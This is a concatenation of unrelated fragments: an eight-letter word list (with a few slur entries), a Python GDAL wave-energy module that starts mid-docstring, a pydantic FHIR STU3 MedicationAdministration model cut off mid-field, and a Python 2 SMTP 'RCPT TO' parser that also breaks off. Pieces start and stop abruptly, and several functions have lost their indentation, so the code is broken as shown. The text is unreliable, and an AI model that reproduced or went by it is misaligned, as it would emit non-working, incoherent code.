"embryoid",
"embryons",
"emceeing",
"emdashes",
"emeerate",
"emendate",
"emenders",
"emending",
"emeritae",
"emeritas",
"emeroids",
"emersion",
"emetines",
"eminency",
"emissive",
"empalers",
"empaling",
"empanada",
"empanels",
"emperies",
"empirics",
"emplaced",
"emplaces",
"emplaned",
"emplanes",
"empoison",
"emprises",
"emprizes",
"emptiers",
"emptiest",
"emptings",
"empurple",
"empyemas",
"empyemic",
"empyreal",
"empyrean",
"emulsify",
"emulsive",
"emulsoid",
"enactive",
"enactors",
"enactory",
"enameler",
"enamines",
"enamours",
"enations",
"encaenia",
"encaging",
"encashed",
"encashes",
"encasing",
"enceinte",
"enchains",
"enchants",
"enchased",
"enchaser",
"enchases",
"enchoric",
"encipher",
"enclasps",
"enclaved",
"enclitic",
"encloser",
"encomium",
"encoring",
"encrusts",
"encyclic",
"encysted",
"endamage",
"endameba",
"endarchy",
"endashes",
"endbrain",
"endeared",
"endemial",
"endemics",
"endemism",
"endermic",
"endexine",
"endgames",
"enditing",
"endleafs",
"endocarp",
"endocast",
"endoderm",
"endogamy",
"endogens",
"endogeny",
"endopods",
"endorsee",
"endorser",
"endorsor",
"endosarc",
"endosmos",
"endosome",
"endostea",
"endowers",
"endowing",
"endozoic",
"endplate",
"endplays",
"endurers",
"energids",
"enervate",
"enfacing",
"enfeeble",
"enfeoffs",
"enfetter",
"enfevers",
"enfilade",
"enflamed",
"enflames",
"enfolded",
"enfolder",
"enframed",
"enframes",
"engagers",
"engilded",
"enginery",
"engining",
"enginous",
"engirded",
"engirdle",
"engorges",
"engrafts",
"engrails",
"engrains",
"engramme",
"engraves",
"enhaloed",
"enhaloes",
"enigmata",
"enisling",
"enjambed",
"enjoiner",
"enjoyers",
"enkindle",
"enlacing",
"enlistee",
"enlister",
"enlivens",
"enmeshed",
"enmeshes",
"enmities",
"enneadic",
"enneagon",
"ennobled",
"ennobler",
"ennobles",
"enolases",
"enophile",
"enosises",
"enounced",
"enounces",
"enplaned",
"enplanes",
"enraging",
"enravish",
"enricher",
"enrobers",
"enrobing",
"enroller",
"enrooted",
"ensample",
"ensconce",
"enscroll",
"enserfed",
"ensheath",
"enshrine",
"enshroud",
"ensiform",
"ensigncy",
"ensilage",
"ensiling",
"enskying",
"enslaver",
"enslaves",
"ensnared",
"ensnarer",
"ensnares",
"ensnarls",
"ensorcel",
"ensouled",
"ensphere",
"ensurers",
"enswathe",
"entailer",
"entameba",
"entangle",
"entasias",
"entastic",
"entellus",
"ententes",
"enterers",
"enterics",
"enterons",
"enthetic",
"enthrall",
"enthrals",
"enthrone",
"enthuses",
"enticers",
"entoderm",
"entoiled",
"entozoal",
"entozoan",
"entozoic",
"entozoon",
"entrains",
"entreats",
"entreaty",
"entrench",
"entrepot",
"entresol",
"entrusts",
"entwines",
"entwists",
"enureses",
"enuresis",
"enuretic",
"envelops",
"envenoms",
"enviably",
"enwheels",
"enwombed",
"enzootic",
"eobionts",
"eohippus",
"eolipile",
"eolithic",
"eolopile",
"epaulets",
"epazotes",
"epeeists",
"ependyma",
"epergnes",
"ephedras",
"ephedrin",
"ephorate",
"epiblast",
"epibolic",
"epically",
"epicalyx",
"epicarps",
"epicedia",
"epicenes",
"epiclike",
"epicotyl",
"epicures",
"epicycle",
"epiderms",
"epidotes",
"epidotic",
"epifauna",
"epifocal",
"epigenic",
"epigeous",
"epigones",
"epigonic",
"epigonus",
"epigrams",
"epigraph",
"epilated",
"epilates",
"epimeres",
"epimeric",
"epimysia",
"epinasty",
"epiphyte",
"episcias",
"episcope",
"episomal",
"episomes",
"epistasy",
"epistler",
"epistome",
"epistyle",
"epitaphs",
"epitases",
"epitasis",
"epitaxic",
"epitomes",
"epitomic",
"epizoism",
"epizoite",
"epizooty",
"eponymic",
"epopoeia",
"epoxides",
"epoxying",
"epsilons",
"equalise",
"equators",
"equinely",
"equinity",
"equipage",
"equipper",
"equiseta",
"equitant",
"equivoke",
"eradiate",
"erasions",
"erasures",
"erecters",
"erective",
"eremites",
"eremitic",
"eremurus",
"erepsins",
"erethism",
"erewhile",
"ergastic",
"ergative",
"ergotism",
"erigeron",
"eringoes",
"eristics",
"erlkings",
"erodable",
"erodible",
"erogenic",
"erosible",
"erosions",
"erotical",
"erotisms",
"erotized",
"erotizes",
"errantly",
"errantry",
"erratics",
"errhines",
"erringly",
"ersatzes",
"eructate",
"eructing",
"erumpent",
"eryngoes",
"erythron",
"escallop",
"escalope",
"escalops",
"escapees",
"escapers",
"escargot",
"escarole",
"escarped",
"eschalot",
"escheats",
"eschewal",
"eschewed",
"eschewer",
"escolars",
"escoting",
"escrowed",
"escuages",
"esculent",
"eserines",
"esophagi",
"espalier",
"espartos",
"espiegle",
"espousal",
"espouser",
"espouses",
"esquired",
"esquires",
"essayers",
"essaying",
"essonite",
"estating",
"esterify",
"estheses",
"esthesia",
"esthesis",
"esthetes",
"estivate",
"estopped",
"estovers",
"estragon",
"estrange",
"estrayed",
"estreats",
"estriols",
"estrones",
"estruses",
"esurient",
"etageres",
"etamines",
"etatisms",
"etchants",
"eternals",
"eternise",
"eternize",
"etesians",
"ethanols",
"ethephon",
"etherify",
"etherish",
"etherize",
"ethicals",
"ethician",
"ethicize",
"ethinyls",
"ethmoids",
"ethnarch",
"ethnical",
"ethnonym",
"ethnoses",
"ethogram",
"ethoxies",
"ethoxyls",
"ethylate",
"ethynyls",
"etiolate",
"etouffee",
"eucaines",
"eucalypt",
"eucharis",
"euchring",
"euclases",
"eucrites",
"eucritic",
"eudaemon",
"eudaimon",
"eudemons",
"eugenias",
"eugenist",
"eugenols",
"euglenas",
"euglenid",
"eulachan",
"eulachon",
"eulogiae",
"eulogias",
"eulogies",
"eulogise",
"eulogist",
"eulogium",
"eulogize",
"euonymus",
"eupatrid",
"eupepsia",
"eupeptic",
"euphenic",
"euphonic",
"euphotic",
"euphrasy",
"euphroes",
"euphuism",
"euphuist",
"euploids",
"euploidy",
"eupnoeas",
"eupnoeic",
"eurokies",
"eurokous",
"europium",
"eurybath",
"eurythmy",
"eusocial",
"eustatic",
"eusteles",
"eutaxies",
"eutectic",
"eutrophy",
"euxenite",
"evacuant",
"evadable",
"evadible",
"evanesce",
"evangels",
"evasions",
"evection",
"evenfall",
"evenness",
"evensong",
"eversion",
"everting",
"evertors",
"everymen",
"everyway",
"evictees",
"evicting",
"evictors",
"evildoer",
"evillest",
"evilness",
"evincing",
"evincive",
"evitable",
"evocable",
"evocator",
"evolutes",
"evolvers",
"evonymus",
"evulsing",
"evulsion",
"exabytes",
"exacters",
"exactest",
"exaction",
"exactors",
"exahertz",
"exalters",
"exalting",
"examinee",
"exampled",
"exanthem",
"exaptive",
"exarchal",
"exceeder",
"excessed",
"exciding",
"excimers",
"exciples",
"excising",
"excitant",
"exciters",
"excitons",
"excitors",
"exclaves",
"excluder",
"excretal",
"excreter",
"excretes",
"excursus",
"excusers",
"execrate",
"executer",
"exegeses",
"exegetes",
"exegetic",
"exemplum",
"exequial",
"exequies",
"exergual",
"exergues",
"exertive",
"exhalant",
"exhalent",
"exhaling",
"exhedrae",
"exhorter",
"exhumers",
"exhuming",
"exigence",
"exigency",
"exigible",
"exiguity",
"exiguous",
"exilable",
"eximious",
"exitless",
"exocarps",
"exocrine",
"exocytic",
"exoderms",
"exoduses",
"exoergic",
"exogamic",
"exonumia",
"exorable",
"exorcise",
"exorcize",
"exordial",
"exordium",
"exosmose",
"exospore",
"exoteric",
"exotisms",
"exotoxic",
"exotoxin",
"expandor",
"expecter",
"expellee",
"expeller",
"expender",
"experted",
"expiable",
"expiated",
"expiates",
"expiator",
"expirers",
"expiries",
"explants",
"exploder",
"exposals",
"exposers",
"exposits",
"expounds",
"expulsed",
"expulses",
"expunger",
"expunges",
"exscinds",
"exsecant",
"exsected",
"exserted",
"externes",
"extincts",
"extolled",
"extoller",
"extorted",
"extorter",
"extrados",
"extremer",
"extremum",
"extrorse",
"extrudes",
"extubate",
"exudates",
"exultant",
"exulting",
"exurbias",
"exuviate",
"eyebeams",
"eyeblack",
"eyeblink",
"eyebolts",
"eyedness",
"eyedrops",
"eyefolds",
"eyeholes",
"eyehooks",
"eyelifts",
"eyepoint",
"eyeshade",
"eyeshine",
"eyeshots",
"eyesores",
"eyespots",
"eyestalk",
"eyestone",
"eyeteeth",
"eyetooth",
"eyewater",
"eyewinks",
"fabliaux",
"fabulate",
"fabulist",
"faceable",
"facedown",
"facemask",
"facetely",
"facetiae",
"faceting",
"facetted",
"facially",
"faciends",
"facilely",
"factious",
"factotum",
"factures",
"faddiest",
"faddisms",
"faddists",
"fadeless",
"fadeouts",
"faggiest",
"faggoted",
"faggotry",
"fagoters",
"fagoting",
"fahlband",
"faiences",
"faineant",
"fainters",
"faintish",
"fairgoer",
"fairings",
"fairlead",
"fairyism",
"faithing",
"faitours",
"fakeries",
"falafels",
"falbalas",
| |
base_dict_data in well-known text format.
target_sr_wkt (str): target spatial reference in well-known text format
Returns:
None
"""
# If the target_vector_path exists delete it
if os.path.isfile(target_vector_path):
driver = ogr.GetDriverByName(_VECTOR_DRIVER_NAME)
driver.DeleteDataSource(target_vector_path)
base_sr = osr.SpatialReference()
base_sr.ImportFromWkt(base_sr_wkt)
target_sr = osr.SpatialReference()
target_sr.ImportFromWkt(target_sr_wkt)
# Get coordinate transformation from base spatial reference to target,
# in order to transform wave points to target_sr
coord_trans, _ = _get_coordinate_transformation(base_sr, target_sr)
LOGGER.info('Creating new vector')
output_driver = ogr.GetDriverByName(_VECTOR_DRIVER_NAME)
output_vector = output_driver.CreateDataSource(target_vector_path)
target_layer = output_vector.CreateLayer(str(layer_name), target_sr,
ogr.wkbPoint)
# Construct a dictionary of field names and their corresponding types
field_dict = {
'ID': ogr.OFTInteger,
'TYPE': ogr.OFTString,
'LAT': ogr.OFTReal,
'LONG': ogr.OFTReal,
'LOCATION': ogr.OFTString
}
LOGGER.info('Creating fields for the vector')
for field_name in ['ID', 'TYPE', 'LAT', 'LONG', 'LOCATION']:
target_field = ogr.FieldDefn(field_name, field_dict[field_name])
target_layer.CreateField(target_field)
LOGGER.info('Entering iteration to create and set the features')
# For each inner dictionary (for each point) create a point
for point_dict in base_dict_data.values():
latitude = float(point_dict['lat'])
longitude = float(point_dict['long'])
# When projecting to WGS84, extents -180 to 180 are used for longitude.
# In case input longitude is from -360 to 0 convert
if longitude < -180:
longitude += 360
geom = ogr.Geometry(ogr.wkbPoint)
geom.AddPoint_2D(longitude, latitude)
geom.Transform(coord_trans)
output_feature = ogr.Feature(target_layer.GetLayerDefn())
target_layer.CreateFeature(output_feature)
for field_name in point_dict:
output_feature.SetField(field_name, point_dict[field_name])
output_feature.SetGeometryDirectly(geom)
target_layer.SetFeature(output_feature)
output_feature = None
output_vector = None
LOGGER.info('Finished _dict_to_point_vector')
def _get_points_geometries(base_vector_path):
    """Collect the XY coordinate of every point feature in a vector.

    Each point feature's X and Y values are stored as an
    [x_location, y_location] pair in the returned numpy array.

    Parameters:
        base_vector_path (str): a path to an OGR vector file.

    Returns:
        a numpy array of [x, y] pairs, one per point feature in the
        shapefile.
    """
    coord_list = []
    vector = gdal.OpenEx(base_vector_path, gdal.OF_VECTOR)
    layer = vector.GetLayer(0)
    for feature in layer:
        geometry = feature.GetGeometryRef()
        coord_list.append([float(geometry.GetX()), float(geometry.GetY())])
        # Release the GDAL feature reference before fetching the next one.
        feature = None
    layer = None
    vector = None
    return numpy.array(coord_list)
def _calculate_min_distances(xy_1, xy_2):
"""Calculate the shortest distances and indexes of points in xy_1 to xy_2.
For all points in xy_1, this function calculates the distance from point
xy_1 to various points in xy_2, and stores the shortest distances found in
a list min_dist. The function also stores the index from which ever point
in xy_2 was closest, as an id in a list that corresponds to min_dist.
Parameters:
xy_1 (numpy.array): An array of points in the form [x,y]
xy_2 (numpy.array): An array of points in the form [x,y]
Returns:
min_dist (numpy.array): An array of shortest distances for each point
in xy_1 to xy_2.
min_id (numpy.array): An array of indexes corresponding to the array
of shortest distances (min_dist).
"""
# Create two numpy array of zeros with length set to as many points in xy_1
min_dist = numpy.zeros(len(xy_1))
min_id = numpy.zeros(len(xy_1))
# For all points xy_point in xy_1 calculate the distance from xy_point to
# xy_2 and save the shortest distance found.
for idx, xy_point in enumerate(xy_1):
dists = numpy.sqrt(numpy.sum((xy_point - xy_2)**2, axis=1))
min_dist[idx], min_id[idx] = dists.min(), dists.argmin()
return min_dist, min_id
def _binary_wave_data_to_dict(wave_file_path):
    """Convert a pickled binary WW3 file into a dictionary.

    The dictionary's keys are the corresponding (I,J) values and the value is
    a two-dimensional array representing a matrix of the number of hours a
    seastate occurs over a 5 year period. The row and column fields are
    extracted once and stored in the dictionary as well.

    Binary layout (as read below): two int32 values (n_cols, n_rows),
    n_cols float32 periods, n_rows float32 heights, then repeated records of
    an int32 (i, j) key followed by an n_rows x n_cols float32 matrix.

    Parameters:
        wave_file_path (str): path to a pickled binary WW3 file.

    Returns:
        wave_dict (dict): a dictionary of matrices representing hours of
            specific seastates, as well as the period and height ranges.
            It has the following structure:
               {'periods': [1,2,3,4,...],
                'heights': [.5,1.0,1.5,...],
                'bin_matrix': { (i0,j0): [[2,5,3,2,...], [6,3,4,1,...],...],
                                (i1,j1): [[2,5,3,2,...], [6,3,4,1,...],...],
                                ...
                                (in, jn): [[2,5,3,2,...], [6,3,4,1,...],...]
                              }
               }
    """
    LOGGER.info('Extrapolating wave data from text to a dictionary')
    # Create a key that hosts another dictionary where the matrix
    # representation of the seastate bins will be saved
    wave_dict = {'bin_matrix': {}}
    wave_array = None
    key = None
    # Use a context manager so the file handle is closed even if a malformed
    # file makes struct.unpack raise mid-parse (the previous open/close pair
    # leaked the handle on any exception).
    with open(wave_file_path, 'rb') as wave_file:
        # Header: number of columns (periods) and rows (heights).
        row_col_bin = wave_file.read(8)
        n_cols, n_rows = struct.unpack('ii', row_col_bin)
        # Read the period and height axis values.
        line = wave_file.read(n_cols * 4)
        wave_periods = list(struct.unpack('f' * n_cols, line))
        line = wave_file.read(n_rows * 4)
        wave_heights = list(struct.unpack('f' * n_rows, line))
        while True:
            line = wave_file.read(8)
            if not line:
                # End of file: flush the matrix accumulated for the last key.
                wave_dict['bin_matrix'][key] = numpy.array(wave_array)
                break
            if key is not None:
                # A new record begins; store the previous key's matrix first.
                wave_dict['bin_matrix'][key] = numpy.array(wave_array)
            # Clear out array and start accumulating rows for the new key.
            wave_array = []
            key = struct.unpack('ii', line)
            for _ in itertools.repeat(None, n_rows):
                line = wave_file.read(n_cols * 4)
                wave_array.append(list(struct.unpack('f' * n_cols, line)))
    # Add row/col field to dictionary
    LOGGER.debug('WaveData col %s', wave_periods)
    wave_dict['periods'] = numpy.array(wave_periods, dtype='f')
    LOGGER.debug('WaveData row %s', wave_heights)
    wave_dict['heights'] = numpy.array(wave_heights, dtype='f')
    LOGGER.info('Finished extrapolating wave data to dictionary.')
    return wave_dict
def _machine_csv_to_dict(machine_csv_path):
    """Create a dictionary from the table in a machine CSV file.

    The dictionary's keys are the 'NAME' entries from the machine table and
    its values come from the corresponding 'VALUE' field. Missing columns are
    not checked here because the file is validated by the validate() function.

    Parameters:
        machine_csv_path (str): path to the input machine CSV file.

    Returns:
        machine_dict (dict): a dictionary of keys from the first column of
            the CSV file and corresponding values from the `VALUE` column.
    """
    # Lowercase columns/index and strip whitespace so lookups are
    # insensitive to formatting in the source table.
    machine_data = utils.read_csv_to_dataframe(
        machine_csv_path, to_lower=True, index_col=0)
    machine_data.index = machine_data.index.str.strip()
    machine_data.index = machine_data.index.str.lower()
    # Rows whose index is NaN carry no parameter name; drop them.
    machine_data = machine_data[machine_data.index.notnull()]
    LOGGER.debug('machine_data dataframe from %s: %s' %
                 (machine_csv_path, machine_data))
    return {
        name: row['value']
        for name, row in machine_data.to_dict('index').items()
    }
def _get_vector_spatial_ref(base_vector_path):
    """Get the spatial reference of an OGR vector (datasource).

    Parameters:
        base_vector_path (str): a path to an ogr vector

    Returns:
        spat_ref: a spatial reference
    """
    base_vector = gdal.OpenEx(base_vector_path, gdal.OF_VECTOR)
    spat_ref = base_vector.GetLayer(0).GetSpatialRef()
    # Release the GDAL dataset reference once the spatial ref is extracted.
    base_vector = None
    return spat_ref
def _get_coordinate_transformation(source_sr, target_sr):
    """Create coordinate transformations between two spatial references.

    One transformation maps source to target, the other maps target back
    to source.

    Parameters:
        source_sr (osr.SpatialReference): A spatial reference
        target_sr (osr.SpatialReference): A spatial reference

    Returns:
        A tuple: coord_trans (source to target) and coord_trans_opposite
        (target to source)
    """
    forward = osr.CoordinateTransformation(source_sr, target_sr)
    backward = osr.CoordinateTransformation(target_sr, source_sr)
    return (forward, backward)
def _create_percentile_rasters(base_raster_path, target_raster_path,
units_short, units_long, percentile_list,
working_dir, start_value=None):
"""Create a percentile (quartile) raster based on the raster_dataset.
An attribute table is also constructed for the raster_dataset that displays
the ranges provided by taking the quartile of values.
Parameters:
base_raster_path (str): path to a GDAL raster with data of type
integer
target_raster_path (str): path to the destination of the new raster.
units_short (str): The shorthand for the units of the raster values,
ex: kW/m.
units_long (str): The description of the units of the raster values,
ex: wave power per unit width of wave crest length (kW/m).
percentile_list (list): A list of the _PERCENTILES ranges,
ex: [25, 50, 75, 90].
start_value (str): The first value that goes to the first percentile
range (start_value: percentile_one) (optional)
Returns:
None
"""
LOGGER.info('Creating Percentile Rasters')
temp_dir = tempfile.mkdtemp(dir=working_dir)
# If the target_raster_path is already a file, delete it
if os.path.isfile(target_raster_path):
os.remove(target_raster_path)
target_nodata = 255
base_raster_info = pygeoprocessing.get_raster_info(base_raster_path)
base_nodata = base_raster_info['nodata'][0]
base_dtype = base_raster_info['datatype']
def _mask_below_start_value(array):
valid_mask = (array != base_nodata) & (array >= float(start_value))
result = numpy.empty_like(array)
result[:] = base_nodata
result[valid_mask] = array[valid_mask]
return result
if start_value is not None:
masked_raster_path = os.path.join(
temp_dir, os.path.basename(base_raster_path))
pygeoprocessing.raster_calculator(
[(base_raster_path, 1)], _mask_below_start_value,
masked_raster_path, base_dtype, base_nodata)
input_raster_path = masked_raster_path
else:
input_raster_path = base_raster_path
# Get the percentile values for each percentile
percentile_values = pygeoprocessing.raster_band_percentile(
(input_raster_path, 1),
os.path.join(temp_dir, 'percentile'),
percentile_list)
shutil.rmtree(temp_dir, ignore_errors=True)
# Get the percentile ranges as strings so that they can be added to the
# output table. Also round them for readability.
value_ranges = []
rounded_percentiles = numpy.round(percentile_values, decimals=2)
# Add the first range with the starting value if it exists
if start_value:
value_ranges.append('%s to %s' % (start_value, rounded_percentiles[0]))
else:
value_ranges.append('Less than or equal to %s' % rounded_percentiles[0])
value_ranges += ['%s to %s' % (p, q) | |
# -*- coding: utf-8 -*-
"""
Profile: http://hl7.org/fhir/StructureDefinition/MedicationAdministration
Release: STU3
Version: 3.0.2
Revision: 11917
Last updated: 2019-10-24T11:53:00+11:00
"""
from typing import Any, Dict
from typing import List as ListType
from pydantic import Field, root_validator
from . import backboneelement, domainresource, fhirtypes
class MedicationAdministration(domainresource.DomainResource):
"""Disclaimer: Any field name ends with ``__ext`` does't part of
Resource StructureDefinition, instead used to enable Extensibility feature
for FHIR Primitive Data Types.
Administration of medication to a patient.
Describes the event of a patient consuming or otherwise being administered
a medication. This may be as simple as swallowing a tablet or it may be a
long running infusion. Related resources tie this event to the authorizing
prescription, and the specific encounter between patient and health care
practitioner.
"""
resource_type = Field("MedicationAdministration", const=True)
category: fhirtypes.CodeableConceptType = Field(
None,
alias="category",
title="Type of medication usage",
description=(
"Indicates the type of medication administration and where the "
"medication is expected to be consumed or administered."
),
# if property is element of this resource.
element_property=True,
)
context: fhirtypes.ReferenceType = Field(
None,
alias="context",
title="Encounter or Episode of Care administered as part of",
description=(
"The visit, admission or other contact between patient and health care "
"provider the medication administration was performed as part of."
),
# if property is element of this resource.
element_property=True,
# note: Listed Resource Type(s) should be allowed as Reference.
enum_reference_types=["Encounter", "EpisodeOfCare"],
)
definition: ListType[fhirtypes.ReferenceType] = Field(
None,
alias="definition",
title="Instantiates protocol or definition",
description=(
"A protocol, guideline, orderset or other definition that was adhered "
"to in whole or in part by this event."
),
# if property is element of this resource.
element_property=True,
# note: Listed Resource Type(s) should be allowed as Reference.
enum_reference_types=["PlanDefinition", "ActivityDefinition"],
)
device: ListType[fhirtypes.ReferenceType] = Field(
None,
alias="device",
title="Device used to administer",
description=(
"The device used in administering the medication to the patient. For "
"example, a particular infusion pump."
),
# if property is element of this resource.
element_property=True,
# note: Listed Resource Type(s) should be allowed as Reference.
enum_reference_types=["Device"],
)
dosage: fhirtypes.MedicationAdministrationDosageType = Field(
None,
alias="dosage",
title="Details of how medication was taken",
description=(
"Describes the medication dosage information details e.g. dose, rate, "
"site, route, etc."
),
# if property is element of this resource.
element_property=True,
)
effectiveDateTime: fhirtypes.DateTime = Field(
None,
alias="effectiveDateTime",
title="Start and end time of administration",
description=(
"A specific date/time or interval of time during which the "
"administration took place (or did not take place, when the 'notGiven' "
"attribute is true). For many administrations, such as swallowing a "
"tablet the use of dateTime is more appropriate."
),
# if property is element of this resource.
element_property=True,
# Choice of Data Types. i.e effective[x]
one_of_many="effective",
one_of_many_required=True,
)
effectiveDateTime__ext: fhirtypes.FHIRPrimitiveExtensionType = Field(
None,
alias="_effectiveDateTime",
title="Extension field for ``effectiveDateTime``.",
)
effectivePeriod: fhirtypes.PeriodType = Field(
None,
alias="effectivePeriod",
title="Start and end time of administration",
description=(
"A specific date/time or interval of time during which the "
"administration took place (or did not take place, when the 'notGiven' "
"attribute is true). For many administrations, such as swallowing a "
"tablet the use of dateTime is more appropriate."
),
# if property is element of this resource.
element_property=True,
# Choice of Data Types. i.e effective[x]
one_of_many="effective",
one_of_many_required=True,
)
eventHistory: ListType[fhirtypes.ReferenceType] = Field(
None,
alias="eventHistory",
title="A list of events of interest in the lifecycle",
description=(
"A summary of the events of interest that have occurred, such as when "
"the administration was verified."
),
# if property is element of this resource.
element_property=True,
# note: Listed Resource Type(s) should be allowed as Reference.
enum_reference_types=["Provenance"],
)
identifier: ListType[fhirtypes.IdentifierType] = Field(
None,
alias="identifier",
title="External identifier",
description=(
"External identifier - FHIR will generate its own internal identifiers "
"(probably URLs) which do not need to be explicitly managed by the "
"resource. The identifier here is one that would be used by another "
"non-FHIR system - for example an automated medication pump would "
"provide a record each time it operated; an administration while the "
"patient was off the ward might be made with a different system and "
"entered after the event. Particularly important if these records have"
" to be updated."
),
# if property is element of this resource.
element_property=True,
)
medicationCodeableConcept: fhirtypes.CodeableConceptType = Field(
None,
alias="medicationCodeableConcept",
title="What was administered",
description=(
"Identifies the medication that was administered. This is either a link"
" to a resource representing the details of the medication or a simple "
"attribute carrying a code that identifies the medication from a known "
"list of medications."
),
# if property is element of this resource.
element_property=True,
# Choice of Data Types. i.e medication[x]
one_of_many="medication",
one_of_many_required=True,
)
medicationReference: fhirtypes.ReferenceType = Field(
None,
alias="medicationReference",
title="What was administered",
description=(
"Identifies the medication that was administered. This is either a link"
" to a resource representing the details of the medication or a simple "
"attribute carrying a code that identifies the medication from a known "
"list of medications."
),
# if property is element of this resource.
element_property=True,
# Choice of Data Types. i.e medication[x]
one_of_many="medication",
one_of_many_required=True,
# note: Listed Resource Type(s) should be allowed as Reference.
enum_reference_types=["Medication"],
)
notGiven: bool = Field(
None,
alias="notGiven",
title="True if medication not administered",
description=(
"Set this to true if the record is saying that the medication was NOT "
"administered."
),
# if property is element of this resource.
element_property=True,
)
notGiven__ext: fhirtypes.FHIRPrimitiveExtensionType = Field(
None, alias="_notGiven", title="Extension field for ``notGiven``."
)
note: ListType[fhirtypes.AnnotationType] = Field(
None,
alias="note",
title="Information about the administration",
description=(
"Extra information about the medication administration that is not "
"conveyed by the other attributes."
),
# if property is element of this resource.
element_property=True,
)
partOf: ListType[fhirtypes.ReferenceType] = Field(
None,
alias="partOf",
title="Part of referenced event",
description="A larger event of which this particular event is a component or step.",
# if property is element of this resource.
element_property=True,
# note: Listed Resource Type(s) should be allowed as Reference.
enum_reference_types=["MedicationAdministration", "Procedure"],
)
performer: ListType[fhirtypes.MedicationAdministrationPerformerType] = Field(
None,
alias="performer",
title="Who administered substance",
description=(
"The individual who was responsible for giving the medication to the "
"patient."
),
# if property is element of this resource.
element_property=True,
)
prescription: fhirtypes.ReferenceType = Field(
None,
alias="prescription",
title="Request administration performed against",
description=(
"The original request, instruction or authority to perform the "
"administration."
),
# if property is element of this resource.
element_property=True,
# note: Listed Resource Type(s) should be allowed as Reference.
enum_reference_types=["MedicationRequest"],
)
reasonCode: ListType[fhirtypes.CodeableConceptType] = Field(
None,
alias="reasonCode",
title="Reason administration performed",
description="A code indicating why the medication was given.",
# if property is element of this resource.
element_property=True,
)
reasonNotGiven: ListType[fhirtypes.CodeableConceptType] = Field(
None,
alias="reasonNotGiven",
title="Reason administration not performed",
description="A code indicating why the administration was not performed.",
# if property is element of this resource.
element_property=True,
)
reasonReference: ListType[fhirtypes.ReferenceType] = Field(
None,
alias="reasonReference",
title=(
"Condition or Observation that supports why the medication was "
"administered"
),
description=(
"Condition or observation that supports why the medication was "
"administered."
),
# if property is element of this resource.
element_property=True,
# note: Listed Resource Type(s) should be allowed as Reference.
enum_reference_types=["Condition", "Observation"],
)
status: fhirtypes.Code = Field(
...,
alias="status",
title=(
"in-progress | on-hold | completed | entered-in-error | stopped | "
"unknown"
),
description=(
"Will generally be set to show that the administration has been "
"completed. For some long running administrations such as infusions it"
" is possible for an administration to be started but not completed or "
"it may be paused while some other process is under way."
),
# if property is element of this resource.
element_property=True,
# note: Enum values can be used in validation,
# but use in your own responsibilities, read official FHIR documentation.
enum_values=[
"in-progress",
"on-hold",
"completed",
"entered-in-error",
"stopped",
"unknown",
],
)
status__ext: fhirtypes.FHIRPrimitiveExtensionType = Field(
None, alias="_status", title="Extension field for ``status``."
)
subject: fhirtypes.ReferenceType = Field(
...,
alias="subject",
title="Who received medication",
description="The person or | |
from re import match
import sys
from socket import *
def parseReceiptToCmd(string, current_place, string_length):
    """Parse an SMTP "RCPT TO:<path>" command line (Python 2 code).

    On success sends "250 OK" on the module-global connectionSocket and
    returns 1.  On any failure sends the appropriate error reply
    (500/501/503) and returns 0.  Whitespace (space/tab) is allowed
    between "RCPT" and "TO:" and between "TO:" and the <path>.
    NOTE(review): relies on a module-global `connectionSocket` defined
    elsewhere in this file.
    """
    # Too short to even hold the 4-character command verb.
    if(string_length < 4):
        try:
            connectionSocket.send("500 Syntax error: command unrecognized")
        except:
            print "Failed to send message"
            return 0
        return 0
    token = string[:4]
    if (token == "RCPT"):  # first token must be "RCPT" (case-sensitive)
        current_place = current_place + 4
        pass
    else:
        # Not RCPT: distinguish "wrong command for this state" (503)
        # from "unrecognized command" (500).
        if(bool(match('MAIL(( )|(\t))+FROM:', string))):
            try:
                connectionSocket.send("503 Bad sequence of commands")
            except:
                print "Failed to send message"
                return 0
            return 0
        elif(bool(match('DATA(( )|(\t))*$', string))):
            try:
                connectionSocket.send("503 Bad sequence of commands")
            except:
                print "Failed to send message"
                return 0
            return 0
        else:
            try:
                connectionSocket.send("500 Syntax error: command unrecognized")
            except:
                print "Failed to send message"
                return 0
            return 0
    # Skip any whitespace after "RCPT"; the next visible character must
    # be the "T" of "TO:" (uppercase only, despite what the original
    # comments claimed about case-insensitivity).
    for x in range(current_place,string_length):
        if (string[x] == " " or string[x] == "\t"):
            pass
        elif (string[x] == "T"):
            current_place = x
            break
        else:
            try:
                connectionSocket.send("500 Syntax error: command unrecognized")
            except:
                print "Failed to send message"
                return 0
            return 0
    # Verify the literal "TO:" token.
    token = string[current_place:current_place+3]
    if(token == "TO:"):
        current_place = current_place+3
        pass
    else:
        try:
            connectionSocket.send("500 Syntax error: command unrecognized")
        except:
            print "Failed to send message"
            return 0
        return 0
    # Skip whitespace after "TO:", then hand the first non-whitespace
    # position to parsePath.  The whole success path lives inside this
    # loop body and returns out of it on the first non-blank character.
    for x in range(current_place, string_length):
        if (string[x] == " " or string[x] == "\t"):
            pass
        else:
            current_place = x
            current_place = parsePath(string, current_place, string_length)
            if (current_place == 0):  # error already reported deeper down
                return 0
            # Only trailing whitespace may follow the path.
            for x in range (current_place+1,string_length):
                if (string[x] == " " or string[x] == "\t"):
                    pass
                else:
                    try:
                        connectionSocket.send("501 Syntax error in parameters or arguments")
                    except:
                        print "Failed to send message"
                        return 0
                    return 0
            # NOTE(review): this send is not wrapped in try/except like
            # every other send in this function.
            connectionSocket.send("250 OK")
            return 1
    # Loop exhausted: nothing but whitespace followed "TO:" (no path).
    try:
        connectionSocket.send("501 Syntax error in parameters or arguments")
    except:
        print "Failed to send message"
        return 0
    return 0
def parseDomain(string, current_place, string_length, least_2):
    """Parse one <element> of a mailbox domain, recursing on each ".".

    Each element must start with a letter, continue with letters/digits,
    and contain at least two characters (tracked by `least_2`).  Returns
    the index of the first character past the domain, string_length-1 if
    the domain runs to the end of the string, or 0 after sending a 501
    reply on the module-global connectionSocket.
    """
    letter_first = True  # first character of the current element must be a letter
    domain_length = 0    # character count of the current element
    for x in range(current_place, string_length):
        current_place = x
        if(string[x] == "."):  # "." terminates this element, starts the next
            # Previous element too short -> reject.
            if(not least_2):
                try:
                    connectionSocket.send("501 Syntax error in parameters or arguments")
                except:
                    print "Failed to send message"
                    return 0
                return 0
            least_2 = False
            current_place = x
            # A "." may not be the last character of the string.
            if(current_place+2 > string_length):
                try:
                    connectionSocket.send("501 Syntax error in parameters or arguments")
                except:
                    print "Failed to send message"
                    return 0
                return 0
            # Recurse to parse the element after the "."; any number of
            # dot-separated elements is accepted this way.
            return parseDomain(string, current_place+1, string_length, least_2)
        # Allowed element characters: A-Z (65-90), a-z (97-122), 0-9 (48-57).
